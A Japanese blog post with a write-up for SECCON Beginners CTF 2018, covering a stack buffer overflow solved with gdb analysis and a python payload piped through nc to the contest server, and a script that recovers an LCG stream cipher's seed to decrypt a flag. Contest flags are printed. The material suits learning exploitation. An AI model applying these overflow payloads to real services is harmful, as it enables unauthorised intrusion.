<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-jp" lang="ja-jp">
<head>
  <link href="https://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="generator" content="Hugo 0.60.1" />

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <title>SECCON Beginners CTF 2018参加録 &middot; さやかちゃんドットネット</title>
  <meta name="description" content="" />

  
  <link type="text/css" rel="stylesheet" href="https://blog.sayakachan.net/css/print.css" media="print">
  <link type="text/css" rel="stylesheet" href="https://blog.sayakachan.net/css/poole.css">
  <link type="text/css" rel="stylesheet" href="https://blog.sayakachan.net/css/syntax.css">
  <link type="text/css" rel="stylesheet" href="https://blog.sayakachan.net/css/hyde.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Abril+Fatface|PT+Sans:400,400i,700">


  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/apple-touch-icon-144-precomposed.png">
  <link rel="shortcut icon" href="/favicon.png">

  
  
  <meta name="twitter:card" content="summary"/>
  <meta name="twitter:image" content="https://blog.sayakachan.net/images/twitter_card_image.jpg"/>
  <meta name="twitter:title" content="SECCON Beginners CTF 2018参加録"/>
  <meta name="twitter:description" content="サークルでCTFの大会に参加しました。1119点で844チーム中56位。そのときの備忘録を兼ねた自分の解いた問題のWrite-Upです。
SECCON Beginners CTF 2018に参加しました - MIS.W 公式ブログ"/>
</head>

  <body class="theme-base-0a ">
  <aside class="sidebar">
  <div class="container sidebar-sticky">
    <div class="sidebar-about">
      <a href="https://blog.sayakachan.net/"><h1>blog.sayakachan.net</h1></a>
      <p class="lead">
       とあるWeb系企業に勤める社会人のブログです。 
      </p>
    </div>

    <nav>
      <ul class="sidebar-nav">
        
        <li><a href="https://sayakachan.net/"> Portfolio </a></li>
      </ul>
    </nav>

    
    <p>&copy; 2020 sayakachan.net</p>
  </div>
</aside>

    <main class="content container">
    <div class="post">
  <h1>SECCON Beginners CTF 2018参加録</h1>
  <time datetime=2018-05-29T15:30:47Z class="post-date">Tue, May 29, 2018</time>
  <p>サークルでCTFの大会に参加しました。1119点で844チーム中56位。そのときの備忘録を兼ねた自分の解いた問題のWrite-Upです。</p>
<p><a href="http://blog.misw.jp/entry/2018/05/30/100000">SECCON Beginners CTF 2018に参加しました - MIS.W 公式ブログ</a></p>
<h1 id="pwn-condition">[Pwn] condition</h1>
<p>とりあえず接続してみる</p>
<pre><code>$ nc pwn1.chall.beginners.seccon.jp 16268
Please tell me your name...hello
Permission denied
</code></pre><p>接続先で動いているプログラムが与えられているのでダウンロードして、まずはstringsで含まれている文字列を調べてみます。</p>
<pre><code>$ strings condition_68187f0953551cea907c48c016f19ff200de74b4
...
Please tell me your name...
OK! You have permission to get flag!!
flag.txt
Permission denied
...
</code></pre><p>正しい入力をしたらflag.txtを表示する感じですかね。ローカルでテストしたいのでダウンロードフォルダと同じディレクトリに適当にflag.txtを用意して</p>
<pre><code>$ echo hello &gt; flag.txt
</code></pre><p>gdbで逆アセンブルしつつ、デバッガ上で突破できないか試してみます。</p>
<pre><code>GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type &quot;show copying&quot;
and &quot;show warranty&quot; for details.
This GDB was configured as &quot;x86_64-linux-gnu&quot;.
Type &quot;show configuration&quot; for configuration details.
For bug reporting instructions, please see:
lt;http://www.gnu.org/software/gdb/bugs/&gt;.
Find the GDB manual and other documentation resources online at:
lt;http://www.gnu.org/software/gdb/documentation/&gt;.
For help, type &quot;help&quot;.
Type &quot;apropos word&quot; to search for commands related to &quot;word&quot;...
Reading symbols from ./condition_68187f0953551cea907c48c016f19ff200de74b4...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
   0x0000000000400771 &lt;+0&gt;:    push   %rbp
   0x0000000000400772 &lt;+1&gt;:    mov    %rsp,%rbp
   0x0000000000400775 &lt;+4&gt;:    sub    $0x30,%rsp
   0x0000000000400779 &lt;+8&gt;:    movl   $0x0,-0x4(%rbp)
   0x0000000000400780 &lt;+15&gt;:    mov    $0x4008d8,%edi
   0x0000000000400785 &lt;+20&gt;:    mov    $0x0,%eax
   0x000000000040078a &lt;+25&gt;:    callq  0x400600 &lt;printf@plt&gt;
   0x000000000040078f &lt;+30&gt;:    lea    -0x30(%rbp),%rax
   0x0000000000400793 &lt;+34&gt;:    mov    %rax,%rdi
   0x0000000000400796 &lt;+37&gt;:    mov    $0x0,%eax
   0x000000000040079b &lt;+42&gt;:    callq  0x400620 &lt;gets@plt&gt;
   0x00000000004007a0 &lt;+47&gt;:    cmpl   $0xdeadbeef,-0x4(%rbp)
   0x00000000004007a7 &lt;+54&gt;:    jne    0x4007bf &lt;main+78&gt;
   0x00000000004007a9 &lt;+56&gt;:    mov    $0x4008f8,%edi
   0x00000000004007ae &lt;+61&gt;:    callq  0x4005c0 &lt;puts@plt&gt;
   0x00000000004007b3 &lt;+66&gt;:    mov    $0x40091e,%edi
   0x00000000004007b8 &lt;+71&gt;:    callq  0x4007d3 &lt;read_file&gt;
   0x00000000004007bd &lt;+76&gt;:    jmp    0x4007c9 &lt;main+88&gt;
   0x00000000004007bf &lt;+78&gt;:    mov    $0x400927,%edi
   0x00000000004007c4 &lt;+83&gt;:    callq  0x4005c0 &lt;puts@plt&gt;
   0x00000000004007c9 &lt;+88&gt;:    mov    $0x0,%edi
   0x00000000004007ce &lt;+93&gt;:    callq  0x400640 &lt;exit@plt&gt;
End of assembler dump.
(gdb) b *0x00000000004007a0
Breakpoint 1 at 0x4007a0
(gdb) run
Starting program: /home/atsushi/Downloads/condition_68187f0953551cea907c48c016f19ff200de74b4 
Please tell me your name...helloooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

Breakpoint 1, 0x00000000004007a0 in main ()
(gdb) i r rbp
rbp            0x7fffffffdb70    0x7fffffffdb70
(gdb) set{int}0x7fffffffdb6c=0xdeadbeef
(gdb) c
Continuing.
OK! You have permission to get flag!!
hello
[Inferior 1 (process 17809) exited normally]
(gdb) quit
</code></pre><p>disas mainしてみると、スタックポインタをベースポインタから0x30引いて、48バイトのスタック領域を確保しています。その後に0xdeadbeafとベースポインタの4バイト下からを比較をしています。要は48バイトの入力をして、最後の4バイトを0xdeadbeafにすればいいわけです。リトルエンディアンなのでひっくり返して</p>
<pre><code>$ python -c &quot;print(0x2c * 'a' + '\xef\xbe\xad\xde')&quot; | nc pwn1.chall.beginners.seccon.jp 16268
Please tell me your name...OK! You have permission to get flag!!
ctf4b{T4mp3r_4n07h3r_v4r14bl3_w17h_m3m0ry_c0rrup710n}
</code></pre><p>わーい。</p>
<h1 id="crypto-streaming">[Crypto] Streaming</h1>
<p>文字列を暗号化するプログラムであるencrypt.pyと暗号化されたencryptedが与えられています。encrypt.pyの中身を見てみます。</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> os
<span style="color:#f92672">from</span> flag <span style="color:#f92672">import</span> flag


<span style="color:#66d9ef">class</span> <span style="color:#a6e22e">Stream</span>:
    A <span style="color:#f92672">=</span> <span style="color:#ae81ff">37423</span>
    B <span style="color:#f92672">=</span> <span style="color:#ae81ff">61781</span>
    C <span style="color:#f92672">=</span> <span style="color:#ae81ff">34607</span>
    <span style="color:#66d9ef">def</span> __init__(self, seed):
        self<span style="color:#f92672">.</span>seed <span style="color:#f92672">=</span> seed <span style="color:#f92672">%</span> self<span style="color:#f92672">.</span>C

    <span style="color:#66d9ef">def</span> __iter__(self):
        <span style="color:#66d9ef">return</span> self

    <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">next</span>(self):
        self<span style="color:#f92672">.</span>seed <span style="color:#f92672">=</span> (self<span style="color:#f92672">.</span>A <span style="color:#f92672">*</span> self<span style="color:#f92672">.</span>seed <span style="color:#f92672">+</span> self<span style="color:#f92672">.</span>B) <span style="color:#f92672">%</span> self<span style="color:#f92672">.</span>C
        <span style="color:#66d9ef">return</span> self<span style="color:#f92672">.</span>seed

g <span style="color:#f92672">=</span> Stream(int(os<span style="color:#f92672">.</span>urandom(<span style="color:#ae81ff">8</span>)<span style="color:#f92672">.</span>encode(<span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">hex</span><span style="color:#e6db74">&#39;</span>), <span style="color:#ae81ff">16</span>))

encrypted <span style="color:#f92672">=</span> <span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">&#39;</span>
<span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">0</span>, len(flag), <span style="color:#ae81ff">2</span>):
    a <span style="color:#f92672">=</span> int(flag[i:i<span style="color:#f92672">+</span><span style="color:#ae81ff">2</span>]<span style="color:#f92672">.</span>encode(<span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">hex</span><span style="color:#e6db74">&#39;</span>), <span style="color:#ae81ff">16</span>) <span style="color:#f92672">^</span> g<span style="color:#f92672">.</span>next()
    encrypted <span style="color:#f92672">+</span><span style="color:#f92672">=</span> chr(a <span style="color:#f92672">%</span> <span style="color:#ae81ff">256</span>)
    encrypted <span style="color:#f92672">+</span><span style="color:#f92672">=</span> chr(a <span style="color:#f92672">/</span> <span style="color:#ae81ff">256</span>)

open(<span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">encrypted</span><span style="color:#e6db74">&#39;</span>, <span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">wb</span><span style="color:#e6db74">&#39;</span>)<span style="color:#f92672">.</span>write(encrypted)
</code></pre></div><p>ランダム生成されたseedが何だったのか分かれば良さそうです。また、2文字ずつ暗号化して、2文字から2文字を生成しているようです。コンテストのフラグの形式は<code>ctf4b{&hellip;}</code>なので、<code>ctf4b{</code>を暗号化した結果がencryptedの最初の6文字と一致するシード値を探して、その後はそのシード値を使って[a-zA-Z0-9_-{}]からencryptedと比較しつつ選択してflagを生成していきます。</p>
<h4 id="mainpy">main.py</h4>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> os
<span style="color:#f92672">import</span> random

<span style="color:#66d9ef">class</span> <span style="color:#a6e22e">Stream</span>:
<span style="color:#f92672">.</span><span style="color:#f92672">.</span><span style="color:#f92672">.</span>

seed <span style="color:#f92672">=</span> None
text <span style="color:#f92672">=</span> <span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">ctf4b{</span><span style="color:#e6db74">&#39;</span>
enc <span style="color:#f92672">=</span> open(<span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">encrypted</span><span style="color:#e6db74">&#39;</span>, <span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">r</span><span style="color:#e6db74">&#39;</span>)<span style="color:#f92672">.</span>read()
<span style="color:#66d9ef">while</span> True:
    seed <span style="color:#f92672">=</span> int(os<span style="color:#f92672">.</span>urandom(<span style="color:#ae81ff">8</span>)<span style="color:#f92672">.</span>encode(<span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">hex</span><span style="color:#e6db74">&#39;</span>), <span style="color:#ae81ff">16</span>)
    g <span style="color:#f92672">=</span> Stream(seed)
    flag <span style="color:#f92672">=</span> True
    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">0</span>, len(text), <span style="color:#ae81ff">2</span>):
        a <span style="color:#f92672">=</span> int(text[i:i<span style="color:#f92672">+</span><span style="color:#ae81ff">2</span>]<span style="color:#f92672">.</span>encode(<span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">hex</span><span style="color:#e6db74">&#39;</span>), <span style="color:#ae81ff">16</span>) <span style="color:#f92672">^</span> g<span style="color:#f92672">.</span>next()
        <span style="color:#66d9ef">if</span> chr(a <span style="color:#f92672">%</span> <span style="color:#ae81ff">256</span>) <span style="color:#f92672">!=</span> enc[i] <span style="color:#f92672">or</span> chr(a <span style="color:#f92672">/</span> <span style="color:#ae81ff">256</span>) <span style="color:#f92672">!=</span> enc[i<span style="color:#f92672">+</span><span style="color:#ae81ff">1</span>]:
            flag <span style="color:#f92672">=</span> False
            <span style="color:#66d9ef">break</span>
    <span style="color:#66d9ef">if</span> flag:
        <span style="color:#66d9ef">break</span>

chars <span style="color:#f92672">=</span> <span style="color:#e6db74"></span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">1234567890-_{}qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM</span><span style="color:#e6db74">&#34;</span>
res <span style="color:#f92672">=</span> <span style="color:#e6db74"></span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">&#34;</span>
g <span style="color:#f92672">=</span> Stream(seed)
<span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">0</span>, len(enc), <span style="color:#ae81ff">2</span>):
    n <span style="color:#f92672">=</span> g<span style="color:#f92672">.</span>next()
    <span style="color:#66d9ef">while</span> True:
        s <span style="color:#f92672">=</span> chars[random<span style="color:#f92672">.</span>randint(<span style="color:#ae81ff">0</span>, len(chars)<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>)] <span style="color:#f92672">+</span> chars[random<span style="color:#f92672">.</span>randint(<span style="color:#ae81ff">0</span>, len(chars)<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>)]
        a <span style="color:#f92672">=</span> int(s<span style="color:#f92672">.</span>encode(<span style="color:#e6db74"></span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">hex</span><span style="color:#e6db74">&#39;</span>), <span style="color:#ae81ff">16</span>) <span style="color:#f92672">^</span> n
        <span style="color:#66d9ef">if</span> chr(a <span style="color:#f92672">%</span> <span style="color:#ae81ff">256</span>) <span style="color:#f92672">==</span> enc[i] <span style="color:#f92672">and</span> chr(a <span style="color:#f92672">/</span> <span style="color:#ae81ff">256</span>) <span style="color:#f92672">==</span> enc[i<span style="color:#f92672">+</span><span style="color:#ae81ff">1</span>]:
            res <span style="color:#f92672">+</span><span style="color:#f92672">=</span> s
            <span style="color:#66d9ef">break</span>

<span style="color:#66d9ef">print</span> res
</code></pre></div><p>実行します。</p>
<pre><code>$ python main.py
ctf4b{lcg-is-easily-predictable}
</code></pre><p>わーい。でも他の人のwrite-upと比べるとかなり頭の悪いことをやっていますね&hellip;</p>
</div>


    </main>

    
  </body>
</html>
